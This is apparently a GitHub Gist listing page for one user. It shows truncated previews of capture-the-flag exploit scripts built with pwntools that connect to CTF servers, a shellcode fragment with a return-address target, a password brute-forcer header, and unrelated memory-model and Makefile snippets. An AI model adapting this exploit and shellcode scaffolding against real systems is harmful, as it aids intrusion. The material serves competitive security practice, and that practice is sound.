

Ivan Komarov dfyz

dfyz / bad.txt
Created February 9, 2024 03:18
Busytex AR shenanigans
native/texlive/libs/potrace/Makefile:AR = ar
native/texlive/libs/gmp/Makefile:AR = ar
native/texlive/libs/libpng/Makefile:AR = ar
native/texlive/libs/pixman/Makefile:AR = ar
native/texlive/libs/harfbuzz/Makefile:AR = ar
native/texlive/libs/zziplib/Makefile:AR = ar
native/texlive/libs/teckit/Makefile:AR = ar
native/texlive/libs/gd/Makefile:AR = ar
native/texlive/libs/cairo/Makefile:AR = ar
native/texlive/libs/zlib/Makefile:AR = ar
from pwn import *
import string
PROMPT = b'> '
def main():
with remote('blackout.seccon.games', 9999) as tube:
dfyz / brute.cpp
Created September 13, 2023 23:10
/***
* Instructions:
*
 * Just code everything in C, and add __device__ before every global variable and
 * function that should be accessible on the GPU :)
*
* Test on GCC without GPU, just forks:
* gcc -x c -O3 -march=native -o brut brut.cu ; time ./brut 147db93f3e45f64:952781782a15ae6e
*
* CUDA prod:
from pwn import *
# padding; push 0; ret
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
PROMPT = b': '
SHELLCODE = r'''
xor eax, eax
xor rdx, rdx
xor rsi, rsi
dfyz / RB.litmus
Last active May 7, 2023 18:51
Modeling incorrect SPSC ring buffer
AArch64 RB.correct
"
Theoretical results:
States 2
1:X6=0; 1:X9=61;
1:X6=1; 1:X9=41;
"
{
0:X3=x; 0:X4=y; 0:X5=z;
1:X3=x; 1:X4=y; 1:X5=z;
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/random.h>
#include <unistd.h>
aarch64 (8 bytes)
00 88 74 92 and x0, x0, #0x7ffffffff000
c0 03 5f d6 ret
riscv64 (10 bytes)
b7 05 00 e0 lui a1 0xe0000
c5 81 c.srli a1 0x11
6d 8d c.and a0 a1
82 80 c.jr ra
#!/usr/bin/python3
from pwn import *
def p64(n):
    """Pack the integer ``n`` as an 8-byte little-endian unsigned value.

    This deliberately redefines the ``p64`` name brought in by the
    ``from pwn import *`` above, so packing here is always ``"<Q"``
    regardless of any other setting. ``struct.error`` is raised when
    ``n`` is negative or does not fit in 64 bits.
    """
    packer = struct.Struct("<Q")
    return packer.pack(n)
def gen_xorbyte(byteoffset, value, bitwidth, selfstart, jumpthen):
code = b""
for i in range(bitwidth):
if value & (1 << i):
dfyz / sice_supervisor.py
Created February 5, 2023 20:59
An attempt to solve Sice Supervisor from DiceCTF 2023, which almost succeeded
from pwn import *
PROMPT = b'> '
DONE = b'Done!\n'
if __name__ == '__main__':
with process('./sice_supervisor') as tube:
#with remote('mc.ax', 30283) as tube: